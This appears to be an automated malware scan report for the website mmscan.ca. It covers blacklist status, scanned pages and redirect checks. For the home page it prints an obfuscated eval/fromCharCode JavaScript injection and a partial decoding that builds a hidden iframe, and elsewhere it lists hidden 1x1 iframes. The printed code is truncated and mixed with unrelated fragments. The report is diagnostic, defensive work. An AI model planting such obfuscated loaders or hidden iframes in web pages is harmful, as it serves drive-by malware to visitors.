Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mmscan.ca
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mmscan.ca/ | 200 OK Content-Length: 29416 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,43,34,109,34,43,40,40,102,41,63,34,101,34,43,34,110,34,43,34,116,34,58,34,34,41,93,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,113,43, Decoded script: try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,36 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://mmscan.ca/test/apacheasp/test.asp | 200 OK Content-Length: 645 Content-Type: text/html | clean |
http://mmscan.ca/test404page.js | 404 Not Found Content-Length: 6547 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.alexa.com/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.alexa.com/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d" style="width: 1px; height: 1px"> Hidden iFrame found. size: 1x1 src: http://www.dataquantum.com/en/ <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.dataquantum.com/en/" style="width: 1px; height: 1px"> Hidden iFrame found. size: 1x1 src: http://www.google.ca/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d%2b%56%61%6e%63%6f%75%76%65%72%2b%68%6f%73%74%69%6e%67 <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.google.ca/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d%2b%56%61%6e%63%6f%75%76%65%72%2b%68%6f%73%74%69%6e%67" style="width: 1px; height: 1px"> | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19846 Content-Type: text/javascript | clean |
http://mmscan.ca/test/ssi/test.shtml | 200 OK Content-Length: 1174 Content-Type: text/html | clean |
http://mmscan.ca/test/php/test.php | 200 OK Content-Length: 920 Content-Type: text/html | clean |
http://mmscan.ca/test/coldfusion/test.cfm | 200 OK Content-Length: 660 Content-Type: text/html | clean |
http://mmscan.ca/test/perl/test.pl | 200 OK Content-Length: 767 Content-Type: text/html | clean |
http://mmscan.ca/test/python/test.py | 200 OK Content-Length: 771 Content-Type: text/html | clean |
http://mmscan.ca/test/fcgi/test.fcgi | 200 OK Content-Length: 915 Content-Type: text/html | clean |
http://mmscan.ca/test/miva/test.mvc? | 200 OK Content-Length: 6326 Content-Type: text/plain | clean |
http://mmscan.ca/test/miva/documenturlTest=sysvars[Run]</A></TR>
Test Data Directory
Test=datadir
Test Script Directory
Test=scriptdir</TABLE></P>test_systemvariablessysvarlistposcurrent,
test_datadirectoryok
Testing writes to data directory:
diag.dats.time_t, s.version, s.apitype|MvEXPORT_Error
Testing reads from data directory:
l.time_t, l.version, l.apitypeM <span>...167 symbols skipped</span> | 404 Not Found Content-Length: 6547 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.alexa.com/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.alexa.com/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d" style="width: 1px; height: 1px"> Hidden iFrame found. size: 1x1 src: http://www.dataquantum.com/en/ <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.dataquantum.com/en/" style="width: 1px; height: 1px"> Hidden iFrame found. size: 1x1 src: http://www.google.ca/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d%2b%56%61%6e%63%6f%75%76%65%72%2b%68%6f%73%74%69%6e%67 <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.google.ca/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d%2b%56%61%6e%63%6f%75%76%65%72%2b%68%6f%73%74%69%6e%67" style="width: 1px; height: 1px"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mmscan.ca
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 02:21:09 GMT
Accept-Ranges: bytes
ETag: "830045-72e8-7d47b100"
Server: Apache/2.2.3 (CentOS)
Content-Length: 29416
Content-Type: text/html
Last-Modified: Sat, 24 Jan 2015 22:33:08 GMT
X-Powered-By: PleskLin
...29416 bytes of data.
GET / HTTP/1.1
Host: mmscan.ca
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 02:21:09 GMT
Accept-Ranges: bytes
ETag: "830045-72e8-7d47b100"
Server: Apache/2.2.3 (CentOS)
Content-Length: 29416
Content-Type: text/html
Last-Modified: Sat, 24 Jan 2015 22:33:08 GMT
X-Powered-By: PleskLin
...29416 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mmscan.ca
Referer: http://www.google.com/search?q=mmscan.ca
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mmscan.ca
Referer: http://www.google.com/search?q=mmscan.ca
Result:
The result is similar to the first query. There are no suspicious redirects found.